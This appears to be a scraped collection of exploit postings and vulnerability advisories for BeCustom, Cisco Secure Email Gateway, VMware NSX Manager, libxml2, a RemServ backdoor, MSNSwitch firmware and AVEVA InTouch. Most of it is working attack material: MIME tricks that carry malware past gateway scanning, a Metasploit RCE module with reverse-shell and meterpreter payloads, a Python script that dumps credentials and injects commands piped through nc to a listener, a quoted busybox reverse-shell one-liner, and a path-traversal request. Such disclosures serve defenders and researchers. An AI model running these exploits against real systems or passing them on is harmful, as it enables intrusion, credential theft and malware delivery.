type="hidden" name="betheme_url_slug" value="" /><br /> <input type="hidden" name="replaced_logo_url" value="" /><br /> <input type="hidden" name="replaced_theme_image" value="" /><br /> <input type="hidden" name="replaced_theme_desc" value="" /><br /> <input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" /><br /> <input type="hidden" name="submit" value="Save changes" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update to BeCustom 1.0.5.3<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-10-28: Discovery of the vulnerability<br />2022-10-28: CVE requested from Wordfence (CNA)<br />2022-10-28: Wordfence assigns CVE-2022-3747<br />2022-11-01: Vendor notification<br />2022-11-07: No response. Sent another notification.<br />2022-11-08: Opened up a security support case on envato.com<br />2022-11-xx: Vendor publishes version 1.0.5.3 without notification which fixes this issue<br />2022-11-10: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code><br />This report is being published within a coordinated disclosure<br />procedure. The researcher has been in contact with the vendor<br />but not received a satisfactory response within a given time<br />frame. As the attack complexity is low and exploits have already<br />been published by a third party there must be no further delay<br />in making the threads publicly known.<br /><br />The researcher prefers not to take credit for their findings.<br /><br /><br />Evading Malware Detection by Cisco Secure Email Gateways<br />========================================================<br /><br />Cisco Secure Email Gateways, formerly known as Cisco Ironport<br />Email Security Appliances, that are configured to detect<br />malicious email attachments, can easily be circumvented.<br />A remote attacker can leverage error tolerance and different<br />MIME decoding capabilities of email clients, compared with the<br />gateway, to evade detection of malicious payloads by anti-virus<br />components on the gateway.<br /><br />Method 1: Cloaked Base 64<br />-------------------------<br /><br />Step-by-step instruction:<br /><br />1. Prepare an email with the malicious attachment with a<br /> commonplace email client or employing standard MIME encoding,<br /> using content-transfer-encoding base64.<br /><br />2. Insert CR+LF line breaks at random places in the base64<br /> encoded block so that the lines have different lengths,<br /> but in a way that groups of four base64 characters (encoding<br /> three bytes) stay together. This is intended to evade naïve<br /> heuristics to detect base64 even out of context, while not<br /> violating the MIME standard.<br /><br />3. Before the content-transfer-encoding header of the attachment,<br /> insert another contradictory header "Content-Transfer-Encoding:<br /> quoted-printable". This does violate the MIME standard.<br /><br />4. Remove any content-length headers of the message, if present.<br /><br />A complete email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: quoted-printable<br />Content-Transfer-Encoding: base64<br /><br />UEsD<br />BAoAAAAAAN2Q<br />21Q8z1FoRAAAAEQAAAAJABwAZWlj<br />YXIuY29tVVQJAAOh<br />[... more similar lines skipped ...]<br />CwAB<br />BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A<br />AACHAAAAAAA=<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Emails prepared in this fashion will pass through affected<br />gateways with a verdict of being clean from malware, even if<br />the attachment is otherwise easily recognizable malware such as<br />the Eicar test virus. Many popular email clients, on the other<br />hand, will present the attached file and faithfully reproduce<br />it upon saving.<br /><br />Affected systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. Affected Email Clients were<br />Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build<br />16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit),<br />Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others.<br /><br />Method 2: yEnc Encoding<br />-----------------------<br /><br />yEncode or short yEnc is an encoding typically employed by<br />usenet clients. Some email clients are capable of decoding MIME<br />parts with this encoding, too. A remote attacker using this<br />encoding for a malicious email attachment will evade malware<br />detection by affected gateways but may succeed in delivering<br />the payload to victims if they use particular email clients.<br />Other email clients will store the attachment in an undecoded<br />and thus not directly harmful form.<br /><br />An email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: x-yencode<br /><br />=ybegin line=128 size=236 name=file.bin<br />[... binary content skipped ...]<br />=yend size=236<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Affected Systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. An affected Email Client<br />was Mozilla Thunderbird 91.11.0 (64-bit).<br /><br />Method 3: Cloaked Quoted-Printable<br />----------------------------------<br /><br />This method is similar to method 1 with the roles of<br />quoted-printable and base64 swapped. The payload has to<br />be encoded quoted-printable, but with each byte rather than<br />just non-printable bytes encoded and on separate lines with<br />continuation. The contradicting headers now come in the order<br />base64, quoted-printable.<br /><br />An email prepared in this way may look like this:<br /><br />----------------------- begin example -----------------------<br />From: Mallory <mallory@example.com><br />To: Alice <alice@example.com><br />Date: Mon, 27 Jun 2022 18:29:22 +0200<br />Subject: Your present<br />Mime-Version: 1.0<br />Message-Id: <b31a762c.8b44.63b67b5a@example.com><br />Content-type: multipart/mixed; boundary=boundary_ef5dcd26<br /><br />--boundary_ef5dcd26<br />Content-type: text/plain<br />Content-Transfer-Encoding: quoted-printable<br /><br />Here is your present.<br />--boundary_ef5dcd26<br />Content-type: application/octet-stream<br />Content-Disposition: attachment; filename="present.zip"<br />Content-Transfer-Encoding: base64<br />Content-Transfer-Encoding: quoted-printable<br /><br />=50=<br />=4B=<br />=03=<br />=04=<br />[... more similar lines skipped ...]<br />=00=<br />=00=<br />=00=<br />=00=<br />--boundary_ef5dcd26--<br />----------------------- end example -----------------------<br /><br />Affected Systems:<br /><br />This exploit was successfully tested with a zip file containing<br />the Eicar test virus and Cisco Secure Email Gateways with AsyncOS<br />14.2.0-620, 14.0.0-698, and others. Affected Email Clients<br />were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1.<br /><br />References<br />----------<br /><br />Code employing the methods presented here and many similar<br />techniques to manipulate MIME encoding can be found on GitHub:<br />https://github.com/noxxi/mime-is-broken<br /><br />Cisco has published an advisory with a workaround<br />facilitating an undocumented feature of the gateway that<br />can be used to block incorrect MIME. This mitigates<br />many cases of the test suite from GitHub, but not all,<br />particularly not the ones presented in this report. URL:<br />https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679<br /><br />End of the report.<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMware NSX Manager XStream unauthenticated RCE',<br /> 'Description' => %q{<br /> VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.<br /> VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.<br /> Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),<br /> a malicious actor can get remote code execution in the context of 'root' on the appliance.<br /> VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13<br /> are vulnerable to Remote Command Injection.<br /><br /> This module exploits the vulnerability to upload and execute payloads gaining root privileges.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y', # metasploit module author<br /> 'Sina Kheirkhah', # Security researcher (Source Incite)<br /> 'Steven Seeley' # Security researcher (Source Incite)<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-39144'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],<br /> ['URL', 'https://kb.vmware.com/s/article/89809'],<br /> ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],<br /> ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']<br /> ],<br /> 'DisclosureDate' => '2022-10-25',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'curl', 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check_nsx_v_mgr<br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsp')<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> b64 = Rex::Text.encode_base64(cmd)<br /> random_uri = rand_text_alphanumeric(4..10)<br /> xml_payload = <<~XML<br /> <sorted-set><br /> <string>foo</string><br /> <dynamic-proxy><br /> <interface>java.lang.Comparable</interface><br /> <handler class="java.beans.EventHandler"><br /> <target class="java.lang.ProcessBuilder"><br /> <command><br /> <string>bash</string><br /> <string>-c</string><br /> <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string><br /> </command><br /> </target><br /> <action>start</action><br /> </handler><br /> </dynamic-proxy><br /> </sorted-set><br /> XML<br /><br /> return send_request_cgi({<br /> 'method' => 'PUT',<br /> 'ctype' => 'application/xml',<br /> 'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),<br /> 'data' => xml_payload<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br /> end<br /><br /> # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"<br /> # that indicates the target is running VMware NSX Manager (NSX-V)<br /> # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable<br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = check_nsx_v_mgr<br /> return CheckCode::Unknown('No response received from the target!') unless res<br /><br /> html = res.get_html_document<br /> html_title = html.at('title')<br /> if html_title.nil? || html_title.text != 'VMware Appliance Management'<br /> return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')<br /> end<br /><br /> CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :in_memory<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}")<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>libxml2: Integer overflow in xmlParseNameComplex<br /><br />libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters).<br /><br />```<br />static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) {<br />int len = 0, l;<br />[...]<br />return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));<br />}<br />```<br /><br />If the name is greater than or equal to 2**32 characters, then `len` overflows. The calculation for the second argument to xmlDictLookup (`ctxt->input->cur - len`) will point to an address outside of the buffer such as adding 0x80000000 to `cur`.<br /><br />Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. Though similar to Felix’s report [\(CVE-2022-29824\)](https://gitlab.gnome.org/GNOME/libxml2/-/issues/351) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this.<br /><br />_Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._<br /><br />Proof of Concept:<br />```<br />$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml<br />$ ./xmllint --huge /tmp/name_big.xml<br /><br /><br />Program received signal SIGSEGV, Segmentation fault.<br />__strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77<br />77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory.<br />(gdb) bt<br />#0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77<br />#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)<br /> at /usr/local/google/home/maddiestone/libxml2/dict.c:878<br />#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617<br />#3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682<br />#4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729<br />#5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754<br />#6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407<br />#7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165<br />#8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0)<br /> at /usr/local/google/home/maddiestone/libxml2/parser.c:17044<br />#9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128)<br /> at /usr/local/google/home/maddiestone/libxml2/parser.c:17109<br />#10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0)<br /> at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366<br />#11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757<br />(gdb) up<br />#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)<br /> at /usr/local/google/home/maddiestone/libxml2/dict.c:878<br />878 l = strlen((const char *) name);<br />(gdb) up<br />#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617<br />3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));<br />(gdb) p/x len<br />$5 = 0x80000000<br />(gdb) p/x $_siginfo<br />$6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e,<br /> si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e,<br /> si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0,<br /> si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = {<br /> si_band = 0x7ffff795602e, si_fd = 0x0}}}<br />(gdb) p/x ctxt->input->cur<br />$7 = 0x7fff7795602e<br />```<br /><br />Related CVE Numbers: CVE-2022-29824,CVE-2022-40303.<br /><br /><br /><br />Found by: Google Security Research<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.RemServ.d<br />Vulnerability: Unauthenticated Remote Command Execution<br />Family: RemServ<br />Type: PE32<br />MD5: 05a082d441d9cf365749c0e1eb904c85<br />Vuln ID: MVID-2022-0655<br />Disclosure: 11/11/2022<br />Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 26103<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\>whoami<br />whoami<br />nt authority\system<br /><br />C:\>net user<br />net user<br /><br />User accounts for \\<br /><br />----------------------------------------------------------------------------<br />Administrator DefaultAccount Guest<br />Victim WDAGUtilityAccount<br />The command completed with one or more errors.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)<br />Google Dork: n/a<br />Date:9/1/2022<br />Exploit Author: Eli Fulkerson<br />Vendor Homepage: https://www.msnswitch.com/<br />Version: MNT.2408<br />Tested on: MNT.2408 firmware<br />CVE: CVE-2022-32429<br /><br />#!/usr/bin/python3<br /><br /><br />"""<br /><br />POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.<br /><br />Configuration dump only requires HTTP access.<br />Full RCE requires you to be on the same subnet as the device.<br /><br />""" <br /><br />import requests<br />import sys<br />import urllib.parse<br />import readline<br />import random<br />import string<br /><br /><br /># listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST<br />LISTENER_HOST = "192.168.EDIT.ME"<br />LISTENER_PORT = 3434<br /><br /># target msnswitch<br />TARGET="192.168.EDIT.ME2"<br />PORT=80<br /><br />USERNAME = None<br />PASSWORD = None<br /><br />"""<br />First vulnerability, unauthenticated configuration/credential dump<br />"""<br />if USERNAME == None or PASSWORD == None:<br /> # lets just ask<br /> hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"<br /> session = requests.session()<br /><br /> data = session.get(hack_url)<br /> for each in data.text.split('\n'):<br /> key = None<br /> val = None<br /><br /> try:<br /> key = each.strip().split('=')[0]<br /> val = each.strip().split('=')[1]<br /> except:<br /> pass<br /><br /> if key == "Account1":<br /> USERNAME = val<br /> if key == "Password1":<br /> PASSWORD = val<br /><br />"""<br />Second vulnerability, authenticated command execution<br /><br />This only works on the local lan.<br /><br />for full reverse shell, modify and upload netcat busybox shell script to /tmp:<br /><br /> shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f<br /> download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp<br /><br />ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox<br />"""<br /><br />session = requests.session()<br /><br /># initial login, establishes our Cookie<br />burp0_url = f"http://{TARGET}:{PORT}/goform/login"<br />burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}<br />burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}<br />session.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /># get our csrftoken<br />burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"<br />data = session.get(burp0_url)<br /><br />csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]<br /><br />while True:<br /> CMD = input('x:')<br /> CMD_u = urllib.parse.quote_plus(CMD)<br /> filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))<br /><br /> try:<br /> hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"<br /><br /> session.get(hack_url, timeout=0.01)<br /> except requests.exceptions.ReadTimeout:<br /> pass<br /><br /></code></pre>
<pre><code>Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal<br />Exploit Author: Jens Regel (CRISEC IT-Security)<br />Date: 11/11/2022<br />CVE: CVE-2022-23854<br />Version: Access Anywhere Secure Gateway versions 2020 R2 and older<br /><br />Proof of Concept:<br />GET <br />/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini <br />HTTP/1.1<br /><br />HTTP/1.1 200 OK<br />Server: EricomSecureGateway/8.4.0.26844.*<br />(..)<br /><br />; for 16-bit app support<br />[fonts]<br />[extensions]<br />[mci extensions]<br />[files]<br />[Mail]<br />MAPI=1<br /><br /></code></pre>